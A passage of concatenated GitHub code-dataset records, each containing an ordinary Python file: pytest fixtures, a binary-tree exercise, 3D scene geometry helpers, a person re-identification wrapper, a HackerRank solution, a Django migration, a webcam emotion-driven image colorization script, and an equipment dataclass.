left',fontsize=fs3)\nplt.show()\n","repo_name":"bystrogenomics/bystro-science","sub_path":"Experiments/rare_variant/rare_disease_simulation2.py","file_name":"rare_disease_simulation2.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71979525046","text":"# -*- coding: utf-8 -*-\nimport importlib\nimport json\nimport os.path\n\nimport jsonpickle\nimport pytest\n\nfrom fixture.application import Application\nfrom fixture.orm import ORMFixture\n\nfixture = None\ntarget = None\n\n\ndef load_config(file):\n global target\n if target is None:\n config_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), file)\n with open(config_file, \"r\", encoding=\"utf-8\") as fp:\n target = json.load(fp)\n return target\n\n\n@pytest.fixture\ndef app(request):\n global fixture\n global target\n\n browser = request.config.getoption(\"--browser\")\n web_config = load_config(request.config.getoption(\"--target\"))['web']\n if fixture is None:\n fixture = Application(browser=browser, base_url=web_config['base_url'])\n else:\n if not fixture.is_valid():\n fixture = Application(browser=browser, base_url=web_config['base_url'])\n fixture.session.ensure_logged(username=web_config[\"username\"], password=web_config[\"password\"])\n return fixture\n\n\n@pytest.fixture(scope=\"session\")\ndef db(request):\n db_config = load_config(request.config.getoption(\"--target\"))[\"db\"]\n dbfixture = ORMFixture(host=db_config[\"host\"], database=db_config[\"database\"], user=db_config[\"user\"], password=db_config[\"password\"])\n return dbfixture\n\n\n@pytest.fixture(scope=\"session\", autouse=True)\ndef stop(request):\n def fin():\n fixture.session.ensure_logged(None)\n fixture.destroy()\n\n request.addfinalizer(fin)\n return fixture\n\n\n@pytest.fixture\ndef check_ui(request):\n return request.config.getoption(\"--check_ui\")\n\n\ndef pytest_addoption(parser):\n parser.addoption(\"--browser\", action=\"store\", default=\"chrome\")\n parser.addoption(\"--target\", action=\"store\", default=\"target.json\")\n parser.addoption(\"--check_ui\", action=\"store_true\")\n\n\ndef pytest_generate_tests(metafunc):\n for fixture in metafunc.fixturenames:\n if fixture.startswith(\"data_\"):\n testdata = load_form_module(fixture[5:])\n metafunc.parametrize(fixture, testdata, ids=[str(x) for x in testdata])\n elif fixture.startswith(\"json_\"):\n testdata = load_from_json(fixture[5:])\n metafunc.parametrize(fixture, testdata, ids=[str(x) for x in testdata])\n\n\ndef load_form_module(module):\n return importlib.import_module(f\"data.{module}\").testdata\n\n\ndef load_from_json(filename):\n with open(os.path.join(os.path.dirname(os.path.abspath(__file__)), f\"data/{filename}.json\"), \"r\",\n encoding=\"utf-8\") as fp:\n return jsonpickle.decode(fp.read())\n\n\n@pytest.fixture\ndef x():\n \"\"\"пустая фикстура, чтобы закомментированная параметризация не ломала ран\"\"\"\n return 0\n","repo_name":"brammator/training_b19","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22334614588","text":"# ListBinaryTree class\r\n#\r\n# CSC148 Fall 2014, University of Toronto\r\n# Instructor: David Liu\r\n# ---------------------------------------------\r\n# STUDENT INFORMATION\r\n#\r\n# List your information below, in format\r\n# , \r\n# Yan Zeng, zengyan\r\n# ---------------------------------------------\r\n\r\n\r\nclass ListBinaryTree:\r\n def __init__(self, items):\r\n \"\"\" (ListBinaryTree, list) -> NoneType\r\n\r\n Create a complete binary tree in list form\r\n with the specified items.\r\n\r\n The [None] is used to start indexing items at 1\r\n instead of 0, which is easier.\r\n \"\"\"\r\n\r\n self.items = [None] + items\r\n\r\n def is_empty(self):\r\n \"\"\" (ListBinaryTree) -> bool\r\n Return True if self is empty.\r\n \"\"\"\r\n return len(self.items) == 1\r\n\r\n def root(self):\r\n \"\"\" (ListBinaryTree) -> object\r\n\r\n Return the root item of the tree.\r\n If the tree is empty, raise IndexError.\r\n \"\"\"\r\n\r\n if self.is_empty():\r\n raise IndexError\r\n else:\r\n return self.items[1]\r\n\r\n def go_down_greedy(self, index=1):\r\n \"\"\" (ListBinaryTree) -> list\r\n\r\n Return a list of items starting at the node with position index\r\n and ending at a leaf, where at each level the child node\r\n with the smaller value is chosen to recurse on\r\n (in case of ties, choose the left child).\r\n\r\n By default, the list starts at the root of the tree.\r\n\r\n Note: you may use either the provided subtree methods,\r\n or do the index arithmetic yourself.\r\n For maximum learning, try both!\r\n \"\"\"\r\n if index > len(self.items):\r\n return []\r\n else:\r\n lst = [self.items[index]]\r\n lft = 2 * index\r\n rit = 2 * index + 1\r\n if lft >= len(self.items) and rit >=len(self.items):\r\n return lst\r\n elif rit < len(self.items):\r\n return lst + self.go_down_greedy(rit)\r\n elif lft < len(self.items):\r\n return lst + self.go_down_greedy(lft)\r\n elif self.items[lft] < self.items[rit]:\r\n return lst + self.go_down_greedy(lft)\r\n else:\r\n return lst + self.go_down_greedy(rit) \r\n \r\n \r\n \r\n\r\n # Index helper functions\r\n def left(index):\r\n \"\"\" (int) -> int\r\n\r\n Return the index of the left child of the node as position index.\r\n \"\"\"\r\n return 2 * index\r\n\r\n def right(index):\r\n \"\"\" (int) -> int\r\n\r\n Return the index of the right child of the node as position index.\r\n \"\"\"\r\n return 2 * index + 1\r\n","repo_name":"20yvette/CSC148","sub_path":"CSC148/Exercise/e8/list_binary_tree.py","file_name":"list_binary_tree.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5882499410","text":"import trimesh\nimport os\nimport json\nimport numpy as np\nimport torch\nfrom shapely.geometry.polygon import Polygon, LineString, Point\n\nAABBcache = {}\nASPECT = 16 / 9\nwith open('./dataset/objCatListAliv2.json') as f:\n objCatList = json.load(f)\n\n# code is from https://github.com/mikedh/trimesh/issues/507\ndef as_mesh(scene_or_mesh):\n \"\"\"\n Convert a possible scene to a mesh.\n If conversion occurs, the returned mesh has only vertex and face data.\n \"\"\"\n if isinstance(scene_or_mesh, trimesh.Scene):\n if len(scene_or_mesh.geometry) == 0:\n mesh = None # empty scene\n else:\n # we lose texture information here\n mesh = trimesh.util.concatenate(\n tuple(trimesh.Trimesh(vertices=g.vertices, faces=g.faces)\n for g in scene_or_mesh.geometry.values()))\n else:\n # assert(isinstance(mesh, trimesh.Trimesh))\n mesh = scene_or_mesh\n return mesh\n\ndef load_AABB(i):\n if i in AABBcache:\n return AABBcache[i]\n if os.path.exists(f'./dataset/object/{i}/{i}-AABB.json'):\n try:\n with open(f'./dataset/object/{i}/{i}-AABB.json') as f:\n AABBcache[i] = json.load(f)\n return AABBcache[i]\n except json.decoder.JSONDecodeError as e:\n print(e)\n mesh = as_mesh(trimesh.load(f'./dataset/object/{i}/{i}.obj'))\n AABB = {}\n AABB['max'] = [0,0,0]\n AABB['min'] = [0,0,0]\n AABB['max'][0] = np.max(mesh.vertices[:, 0]).tolist()\n AABB['max'][1] = np.max(mesh.vertices[:, 1]).tolist()\n AABB['max'][2] = np.max(mesh.vertices[:, 2]).tolist()\n AABB['min'][0] = np.min(mesh.vertices[:, 0]).tolist()\n AABB['min'][1] = np.min(mesh.vertices[:, 1]).tolist()\n AABB['min'][2] = np.min(mesh.vertices[:, 2]).tolist()\n with open(f'./dataset/object/{i}/{i}-AABB.json', 'w') as f:\n json.dump(AABB, f)\n AABBcache[i] = AABB\n return AABBcache[i]\n\ndef getWallHeight(meshPath):\n mesh = as_mesh(trimesh.load(meshPath))\n return np.max(mesh.vertices[:, 1]).tolist()\n\ndef getMeshVertices(methPath):\n mesh = as_mesh(trimesh.load(meshPath))\n return mesh.vertices\n\ndef objectInDataset(modelId):\n if os.path.exists(f'./dataset/object/{modelId}/'):\n return True\n else:\n return False\n\ndef jsonDumpsDefault(obj):\n if type(obj).__module__ == np.__name__:\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n else:\n return obj.item()\n raise TypeError('Unknown type:', type(obj))\n\n'''\n:param point: the given point in a 3D space\n:param translate: the translation in 3D\n:param angle: the rotation angle on XOZ plain\n:param scale: the scale in 3D\n'''\ndef transform_a_point(point, translate, angle, scale):\n result = point.copy()\n scaled = point.copy()\n scaled = point * scale\n result[0] = np.cos(angle) * scaled[0] + np.sin(angle) * scaled[2]\n result[2] = -np.sin(angle) * scaled[0] + np.cos(angle) * scaled[2]\n return result + translate\n\ndef isLineIntersectsWithEdges(line, floorMeta):\n for i in range(floorMeta.shape[0]):\n l = LineString((floorMeta[i][0:2], floorMeta[(i+1)%floorMeta.shape[0]][0:2]))\n if line.crosses(l):\n return True\n return False\n\ndef pointToLineDistance(point, p1, p2):\n return np.linalg.norm(np.cross(p2-p1, p1-point)) / np.linalg.norm(p2-p1)\n\ndef isPointBetweenLineSeg(point, p1, p2):\n s = np.dot(p2 - p1, point - p1) / np.linalg.norm(p2 - p1)\n if 0 < s and s < np.linalg.norm(p2 - p1):\n return True\n else:\n return False\n\n# https://stackoverflow.com/questions/21037241/how-to-determine-a-point-is-inside-or-outside-a-cube\ndef inside_test(points , cube3d):\n \"\"\"\n cube3d = numpy array of the shape (8,3) with coordinates in the clockwise order. first the bottom plane is considered then the top one.\n points = array of points with shape (N, 3).\n\n Returns the indices of the points array which are outside the cube3d\n \"\"\"\n b1,b2,b3,b4,t1,t2,t3,t4 = cube3d\n\n dir1 = (t1-b1)\n size1 = np.linalg.norm(dir1)\n dir1 = dir1 / size1\n\n dir2 = (b2-b1)\n size2 = np.linalg.norm(dir2)\n dir2 = dir2 / size2\n\n dir3 = (b4-b1)\n size3 = np.linalg.norm(dir3)\n dir3 = dir3 / size3\n\n cube3d_center = (b1 + t3)/2.0\n\n dir_vec = points - cube3d_center\n\n res1 = np.where( (np.absolute(np.dot(dir_vec, dir1)) * 2) > size1 )[0]\n res2 = np.where( (np.absolute(np.dot(dir_vec, dir2)) * 2) > size2 )[0]\n res3 = np.where( (np.absolute(np.dot(dir_vec, dir3)) * 2) > size3 )[0]\n\n return list( set().union(res1, res2, res3) )\n\ndef pointProjectedToPlane(p, normal, startPoint):\n normal = normal / np.linalg.norm(normal)\n distanceToPlane = -np.dot(p - startPoint, normal)\n projectedP = p + distanceToPlane * normal\n return projectedP\n\ndef rogrigues(v, k, theta):\n # returns v_rot. \n return v * np.cos(theta) + np.cross(k, v) * np.sin(theta)\n\ndef rayCastsAABBs(probe, direction, objList):\n \"\"\"\n Note that before calling this api, all the objects should have corresponding AABB. \n \"\"\"\n res = []\n for o in objList:\n if not objectInDataset(o['modelId']):\n continue\n probeToO = np.array(o['AABB']['center']) - probe\n magnitute = np.dot(probeToO, direction) / np.linalg.norm(direction)\n if magnitute <= 0:\n continue\n nP = probe + magnitute * (direction / np.linalg.norm(direction))\n if len(inside_test(nP.reshape(1, 3), o['AABB']['eightPoints'])) == 0:\n res.append({\n 'obj': o,\n 'dis': magnitute,\n })\n res.sort(key=lambda x : x['dis'])\n return res\n\ndef roomDiameter(floorMeta):\n floorMeta = floorMeta[:, 0:2]\n return np.max(np.linalg.norm(floorMeta[:, None, :] - floorMeta, axis=2))\n\nimport threading\nclass BaseThread(threading.Thread):\n def __init__(self, method_args=None, callback=None, callback_args=None, *args, **kwargs):\n target = kwargs.pop('target')\n super(BaseThread, self).__init__(target=self.target_with_callback, *args, **kwargs)\n self.method_args = method_args\n self.callback = callback\n self.method = target\n self.callback_args = callback_args\n\n def target_with_callback(self):\n self.method(*self.method_args)\n if self.callback is not None:\n self.callback(*self.callback_args)\n\ndef getobjCat(modelId):\n if modelId in objCatList:\n if len(objCatList[modelId]) > 0:\n return objCatList[modelId][0]\n else:\n return \"Unknown Category\"\n else:\n return \"Unknown Category\"\n\ndef rotate_pos_prior(points, angle):\n result = points.clone()\n result[:, 0] = torch.cos(angle) * points[:, 0] + torch.sin(angle) * points[:, 2]\n result[:, 2] = -torch.sin(angle) * points[:, 0] + torch.cos(angle) * points[:, 2]\n return result\n\ndef rotate_bb_local_para(points, angle, scale):\n result = points.clone()\n scaled = points.clone()\n scaled = scaled * scale\n result[:, 0] = torch.cos(angle) * scaled[:, 0] + torch.sin(angle) * scaled[:, 1]\n result[:, 1] = -torch.sin(angle) * scaled[:, 0] + torch.cos(angle) * scaled[:, 1]\n return result\n","repo_name":"slothfulxtx/3DScenePlatform","sub_path":"sk.py","file_name":"sk.py","file_ext":"py","file_size_in_byte":7195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"3757361612","text":"# ------------------------------\n# Raymond Ng\n# NUS ISS Internship project 2020\n#\n# Code is adapted from : https://github.com/KaiyangZhou/deep-person-reid\n# ------------------------------\n\nimport os\nimport cv2\nimport time\nimport torch\nimport numpy as np\nimport torchreid\nfrom torch.autograd import Variable\nfrom torchvision import transforms, models\nfrom PIL import Image\n\ndef image_loader(loader, image_name, fromcv2=False):\n if fromcv2:\n image = cv2.resize(image_name, (128,256)) \n image = Image.fromarray(image_name) # Convert to PIL\n else:\n image = Image.open(image_name)\n image = loader(image).float()\n image = image.clone().detach().requires_grad_(True)\n image = image.unsqueeze(0)\n return image\n\ndef fliplr(img, device):\n '''flip horizontal'''\n inv_idx = torch.arange(img.size(3)-1,-1,-1).long().to(device=device) # N x C x H x W\n img_flip = img.index_select(3,inv_idx)\n return img_flip\n\nclass DeepPersonReID:\n def __init__(self, model, weights_path, threshold, device='cpu', verbose=False):\n self.device = torch.device(device)\n self.verbose = verbose\n self.threshold = threshold\n self.model = torchreid.models.build_model(name=model, num_classes=1041).to(self.device)\n torchreid.utils.load_pretrained_weights(self.model, weights_path)\n self.model.eval()\n self.transforms = transforms.Compose([\n transforms.Resize((256,128), interpolation=3),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n \n def extract_features(self, images):\n '''\n Method to extract features by the ReID model\n '''\n features = torch.FloatTensor().to(device=self.device)\n for image in images:\n try:\n img = image_loader(self.transforms, image, True).to(device=self.device)\n except:\n continue\n ff = torch.FloatTensor(1, 512).zero_().to(device=self.device)\n for i in range(2):\n if (i == 1):\n img = fliplr(img, self.device)\n input_img = Variable(img).to(device=self.device)\n output = self.model(input_img)\n ff += output\n fnorm = torch.norm(ff, p=2, dim=1, keepdim=True)\n ff = ff.div(fnorm.expand_as(ff))\n features = torch.cat((features, ff.data.to(device=self.device)), 0)\n return features\n \n def reid(self, qfeat, gfeat):\n '''\n Method to generate ReID score\n '''\n qScore_idx = {}\n for qidx in range(len(qfeat)):\n qf = qfeat[qidx]\n query = qf.view(-1,1)\n score = torch.mm(gfeat, query)\n score = score.squeeze(1).cpu()\n score = score.numpy()\n\n index = np.argsort(score)\n index = index[::-1]\n best_gindex = None\n best_gscore = 0.0\n # Use index[0] here to get the highest scoring index after argsort\n if score[index[0]] > self.threshold:\n qScore_idx[qidx] = index[0]\n best_gindex = index[0]\n best_gscore = score[index[0]]\n\n if self.verbose:\n outtxt = f'Query[{qidx}]\\n'\n for sidx in range(len(score)):\n outtxt += f' Gallery[{sidx}]: ({score[sidx]:.2f})'\n print(outtxt)\n print(f'Best Gallery Index [{best_gindex}], Score ({best_gscore:.2f})\\n')\n return qScore_idx\n\n# FOR DEBUG\n# if __name__ == '__main__':\n # parser = argparse.ArgumentParser(prog='DeepPersonReID.py')\n # parser.add_argument('-qv', '--qvideos-path', type=str, default='video', help='Path to query videos')\n # parser.add_argument('-gv', '--gvideos-path', type=str, default='video', help='Path to gallery videos')\n # parser.add_argument('-s', '--save-vid', action='store_true', help='Save output videos')\n # args = parser.parse_args()\n\n # img = Image.open('35.png')\n # dpReID = DeepPersonReID(os.path.join('model','osnet_ain_x1_0_mars_softmax_cosinelr','model.pth.tar-150'), torch.device('cuda'))\n # print(dpReID.extract_features(['35.png']))\n","repo_name":"raymondng76/NUS-ISS-Internship","sub_path":"ReID/DeepPersonReID/DeepPersonReID.py","file_name":"DeepPersonReID.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"33439919130","text":"#!/usr/bin/python3\n\nfrom bisect import bisect_left, bisect_right\n\n#------------------------------ /!\\ --------------------------------\n# V, x and t can be ignored since the disrupt zone is infinite on X\n#-------------------------------------------------------------------\n\nSEGMENT=100\nN, Q, V = map(int, input().split(\" \"))\n\nposlist = []\nfreqlist = []\ncumfreq = {}\nfor i in range(N):\n x, y, f = map(int, input().split(\" \"))\n poslist.append(y)\n freqlist.append(f)\n cumfreq[f] = 0\n\n# separate into unique and duplicated frequencies\nfreqcount = {}\nfor i in range(len(poslist)):\n if freqlist[i] in freqcount:\n freqcount[freqlist[i]].append(poslist[i])\n else:\n freqcount[freqlist[i]] = [poslist[i]]\n \nuniqposlist = []\ndupfreqlist = []\ndupposlist = []\ndupaccum = []\nfor freq, pos in freqcount.items():\n if len(pos) == 1:\n uniqposlist += pos\n else:\n dupposlist += pos\n dupfreqlist += [freq for i in range(len(pos))]\n dupaccum += [None for i in range(len(pos))]\n \n# sort\nuniqposlist = sorted(uniqposlist)\nif len(dupposlist) > 0:\n dupposlist, dupfreqlist = map(list, zip(*sorted(zip(dupposlist, dupfreqlist)))) # sort both by pos\n\n# accumulate at every segment\nfreqcount = {}\nfor i in range(len(dupposlist)):\n if i % SEGMENT == 0:\n dupaccum[i] = dict(freqcount)\n if dupfreqlist[i] in freqcount:\n freqcount[dupfreqlist[i]] += 1\n else:\n freqcount[dupfreqlist[i]] = 1\n# last accumulation with the total accumulation\ndupaccum.append(dict(freqcount))\n \n# solve\nfor q in range(Q):\n yu, yd, t = map(int, input().split(\" \"))\n \n # retrieve the max duplicated freq\n idxd = bisect_left(dupposlist, yd)\n idxu = bisect_right(dupposlist, yu)\n \n # calculate the accumulation at idxd and idxu from last segments\n dsegment = (idxd // SEGMENT) * SEGMENT\n daccum = dict(dupaccum[dsegment])\n for i in range(dsegment, idxd):\n if dupfreqlist[i] in daccum:\n daccum[dupfreqlist[i]] += 1\n else:\n daccum[dupfreqlist[i]] = 1\n \n usegment = (idxu // SEGMENT) * SEGMENT\n uaccum = dict(dupaccum[usegment])\n for i in range(usegment, idxu):\n if dupfreqlist[i] in uaccum:\n uaccum[dupfreqlist[i]] += 1\n else:\n uaccum[dupfreqlist[i]] = 1\n\n # compute the maximum freq\n maxi = 0\n for freq, count in uaccum.items():\n if freq in daccum.keys():\n if maxi < count - daccum[freq]:\n maxi = count - daccum[freq]\n else:\n if maxi < count:\n maxi = count\n if maxi > 0:\n print(maxi)\n elif bisect_left(uniqposlist, yd) != bisect_right(uniqposlist, yu):\n print(1)\n else:\n print(0)\n","repo_name":"N3mesis98/HackerRank","sub_path":"Starfleet/starfleet.py","file_name":"starfleet.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11175800569","text":"# _*_ coding:utf-8 _*_ \n\nimport csv\n\ndata = [\n ( '0011' , 'http://www.59store.com/' , '59store.com' ),\n ( '0022' , 'http://59data.top/' , '59data.top' ),\n ( '0033' , 'http://my.space.zmx/' , 'hзгyДaЃП' )\n]\n\nwith open('csvtest.csv', 'wb') as csvfile:\n\twriter = csv.writer(csvfile, dialect='excel')\n\twriter.writerow(['id', 'url', 'keywords'])\n\twriter.writerows(data)","repo_name":"yangwii/PythonLearn","sub_path":"csv_write.py","file_name":"csv_write.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20227134161","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('index', '0004_auto_20161210_0750'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='tours',\n name='startaddress',\n field=models.CharField(default='Ho Chi Minh', max_length=100),\n ),\n ]\n","repo_name":"vuonghungvinh/thuc_tap_web","sub_path":"index/migrations/0005_tours_startaddress.py","file_name":"0005_tours_startaddress.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72334617844","text":"import numpy as np\nimport cv2\nfrom keras.preprocessing import image\nfrom time import time\nimport imageio\nimport scipy.ndimage\nimport requests\nimport json\nfrom PIL import Image, ImageDraw, ImageFilter\nimport matplotlib.pyplot as plt\nimport base64\nfrom io import BytesIO\n\nimport urllib3\n\nurllib3.disable_warnings()\n\n\n# -----------------------------\n# open cv initialization\ndef main():\n time_last_call = time()\n\n face_cascade = cv2.CascadeClassifier('./haarcascade_frontalface_default.xml')\n\n cap = cv2.VideoCapture(0)\n # -----------------------------\n # face expression recognizer initialization\n from keras.models import model_from_json\n model = model_from_json(open(\"facial_expression_model_structure.json\", \"r\").read())\n model.load_weights('facial_expression_model_weights.h5') # load weights\n\n # -----------------------------\n emotions = ('angry', 'disgust', 'fear', 'happy', 'sad', 'surprise', 'neutral')\n\n # pool = Pool(processes=1)\n\n # Traitement Image\n img_url = \"https://fineartamerica.com/images/artworkimages/medium/1/on-the-way-to-the-dance--celebrating-cinco-de-mayo-karla-horst.jpg\"\n # img_url = \"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSHfk89RY0vfgSmIWHVUNblxb9jwMzD1hf4WgtzNfRrUywzvWSs\"\n # img_url = \"https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcR_sPl3nRo5bvTX85PYTr96EV9rsrmyoDEFGRUSDgprXoQnSXAi\"\n\n start_img = imageio.imread(img_url)\n\n # start_img.shape(196, 160, 30)\n\n gray_img = greyscale(start_img)\n\n inverted_img = 255 - gray_img\n\n blur_img = scipy.ndimage.filters.gaussian_filter(inverted_img, sigma=40)\n\n final_img = dodge(blur_img, gray_img)\n\n plt.imshow(final_img, cmap='gray')\n\n plt.imsave('./img/new_image.png', final_img, cmap='gray', vmin=0, vmax=255)\n\n # Create an image object\n\n image1 = Image.open(\"./img/new_image.png\")\n\n # Find the edges by applying the filter ImageFilter.FIND_EDGES\n\n # image_with_edges = (image1.filter(ImageFilter.EDGE_ENHANCE_MORE)).filter(ImageFilter.FIND_EDGES)\n\n # display the original show\n # inverted_image = PIL.ImageOps.invert(image_with_edges)\n\n sharpened = (image1.filter(ImageFilter.SMOOTH_MORE)).filter(ImageFilter.DETAIL).filter(ImageFilter.CONTOUR)\n\n image1 = sharpened\n\n image1.save(\"./img/new_image.png\")\n\n # display the new image with edge detection done\n\n while True:\n ret, img = cap.read()\n\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n faces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 0, 0), 2) # draw rectangle to main image\n\n detected_face = img[int(y):int(y + h), int(x):int(x + w)] # crop detected face\n detected_face = cv2.cvtColor(detected_face, cv2.COLOR_BGR2GRAY) # transform to gray scale\n detected_face = cv2.resize(detected_face, (48, 48)) # resize to 48x48\n\n img_pixels = image.img_to_array(detected_face)\n img_pixels = np.expand_dims(img_pixels, axis=0)\n\n img_pixels /= 255 # pixels are in scale of [0, 255]. normalize all pixels in scale of [0, 1]\n\n predictions = model.predict(img_pixels) # store probabilities of 7 expressions\n\n # find max indexed array 0: angry, 1:disgust, 2:fear, 3:happy, 4:sad, 5:surprise, 6:neutral\n max_index = np.argmax(predictions[0])\n\n emotion = emotions[int(max_index)]\n\n # write emotion text above rectangle\n cv2.putText(img, emotion, (int(x), int(y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2)\n\n # call function every seconds\n if time_last_call + 10 < time():\n new_image(emotion, image1.size)\n # \"./ img / images.png\"\n\n display_image = cv2.imread('./img/images.png', 1)\n\n cv2.imshow('image', display_image)\n\n time_last_call = time()\n\n # process on detected face end\n # -------------------------\n\n cv2.imshow('img', img)\n\n if cv2.waitKey(1) & 0xFF == ord('q'): # press q to quit\n break\n\n # kill open cv things\n cap.release()\n cv2.destroyAllWindows()\n\n\ndef greyscale(rgb): return np.dot(rgb[..., :3], [0.299, 0.587, 0.300])\n\n\ndef dodge(front, back):\n result = front * 300 / (300 - back)\n\n result[result > 255] = 255\n\n result[back == 255] = 255\n\n return result.astype('uint8')\n\n\ndef new_image(emotion, size):\n url = \"https://dvic.devinci.fr/dgx/paints_torch/api/v1/colorizer\"\n\n my_image = open('./img/new_image.png', 'rb')\n result_read = my_image.read()\n result_64_encode = base64.encodebytes(result_read)\n\n new_hint(size, emotion)\n\n hint = open('./img/hint.png', 'rb')\n hint_read = hint.read()\n hint_64_encode = base64.encodebytes(hint_read)\n\n json_data = json.dumps({\n 'sketch': result_64_encode.decode(\"utf-8\"),\n 'hint': hint_64_encode.decode(\"utf-8\"),\n 'opacity': 0\n })\n\n headers = {'Content-type': 'application/json; charset=utf-8', 'dataType': 'json'}\n\n # sending get request and saving the response as response object\n r = requests.post(url=url, data=json_data, headers=headers, verify=False)\n\n r.raise_for_status()\n\n json_response = r.json()\n\n img_data = base64.b64decode(json_response['colored'].split(\",\")[1])\n\n final_img = Image.open(BytesIO(img_data))\n\n final_img.save('./img/images.png', 'PNG')\n\n return final_img\n\n\ndef new_hint(size, emotion):\n hin = Image.new('RGBA', size, (255, 0, 0, 0))\n\n if 'angry' == emotion:\n\n main_color = (165, 31, 24)\n second_color = (255, 19, 7)\n third_color = (255, 97, 7)\n\n elif 'disgust' == emotion:\n\n main_color = (12, 147, 7)\n second_color = (14, 119, 77)\n third_color = (102, 130, 32)\n\n elif 'fear' == emotion:\n\n main_color = (114, 162, 181)\n second_color = (69, 98, 109)\n third_color = (121, 136, 142)\n\n elif 'happy' == emotion:\n\n main_color = (216, 45, 116)\n second_color = (255, 104, 167)\n third_color = (255, 183, 213)\n\n elif 'sad' == emotion:\n\n main_color = (132, 117, 145)\n second_color = (145, 117, 130)\n third_color = (124, 127, 127)\n\n elif 'surprise' == emotion:\n\n main_color = (237, 221, 104)\n second_color = (255, 230, 50)\n third_color = (249, 236, 139)\n\n else:\n hin.save('./img/hint.png', 'PNG')\n return\n\n draw = ImageDraw.Draw(hin)\n\n draw.line((size[0] / 3, size[1] / 4 + 4, size[0] / 3, size[1] / 4), fill=main_color, width=3)\n draw.line((size[0] / 3 * 2, size[1] / 4 + 4, size[0] / 3 * 2, size[1] / 4), fill=main_color, width=3)\n draw.line((size[0] / 3, size[1] / 4 * 2 + 4, size[0] / 3, size[1] / 4 * 2), fill=second_color, width=2)\n draw.line((size[0] / 3 * 2, size[1] / 4 * 2 + 4, size[0] / 3 * 2, size[1] / 4 * 2), fill=second_color, width=2)\n draw.line((size[0] / 3, size[1] / 4 * 3 + 4, size[0] / 3, size[1] / 4 * 3), fill=third_color, width=2)\n draw.line((size[0] / 3 * 2, size[1] / 4 * 3 + 4, size[0] / 3 * 2, size[1] / 4 * 3), fill=third_color, width=2)\n\n hin.save('./img/hint.png', 'PNG')\n\n return\n\n\nmain()\n","repo_name":"SimonDebray/emotional-art","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71524144886","text":"from dataclasses import dataclass, field\nfrom typing import List, Literal\nfrom datetime import datetime\nfrom . import nested_objects, reference_attribute\n\nSTATUS = Literal['updated', 'new', 'empty', 'not updated']\n\n\n@dataclass\nclass Equipment:\n\n toir_id: str\n level: int\n parent_toir_id: str\n name: str\n operating: float\n object_type: str\n departament: reference_attribute.ReferenceAttribute\n typical_object: reference_attribute.ReferenceAttribute\n toir_url: str\n parent_object: object = None\n tech_number: str = None\n registration_number: str = None\n commodity_producer: str = None\n commodity_number: str = None\n operation_date: datetime = None\n category: str = None\n replaced: bool = False\n object_id: str = None\n\n properties: List[nested_objects.Property] = field(default_factory=list)\n fact_repairs: List[nested_objects.FactRepair] = field(default_factory=list)\n plan_repairs: List[nested_objects.PlanRepair] = field(default_factory=list)\n failures: List[nested_objects.Failure] = field(default_factory=list)\n parts: List[nested_objects.Part] = field(default_factory=list)\n movements: List[nested_objects.Movement] = field(default_factory=list)\n\n self_id: str = None\n update_status: STATUS = 'empty'\n\n def __str__(self):\n return f'{self.name}, {self.toir_id}'\n\n @property\n def unique_id(self):\n return self.toir_id\n\n @property\n def parent_id(self):\n return self.parent_object.self_id if self.parent_object else None\n\n def get_nested_objects(self):\n return [\n self.properties,\n self.fact_repairs,\n self.plan_repairs,\n self.failures,\n self.parts,\n ]\n\n @property\n def nested_objects_map(self):\n nested_objects = [\n {'nested_object': 'property', 'attribute_name': 'properties'},\n {'nested_object': 'plan_repair', 'attribute_name': 'plan_repairs'},\n {'nested_object': 'fact_repair', 'attribute_name': 'fact_repairs'},\n {'nested_object': 'failure', 'attribute_name': 'failures'},\n {'nested_object': 'part', 'attribute_name': 'parts'},\n ]\n return nested_objects\n\n def to_compare_dict(self) -> dict:\n return {\n 'toir_id': self.toir_id,\n 'name': self.name,\n 'toir_url': self.toir_url,\n 'tech_number': self.tech_number,\n 'registration_number': self.registration_number,\n 'commodity_producer': self.commodity_producer,\n 'commodity_number': self.commodity_number,\n 'object_id': self.object_id,\n 'departament': self.departament.comparison_value,\n 'typical_object': self.typical_object.comparison_value,\n 'category': self.category,\n }\n\n def to_dict(self) -> dict:\n return {\n 'toir_id': self.toir_id,\n 'level': self.level,\n 'parent_toir_id': self.parent_toir_id,\n 'name': self.name,\n 'operating': self.operating,\n 'departament_id': self.departament.toir_id,\n 'object_type_id': self.typical_object.toir_id,\n 'toir_url': self.toir_url,\n 'tech_number': self.tech_number,\n 'registration_number': self.registration_number,\n 'commodity_producer': self.commodity_producer,\n 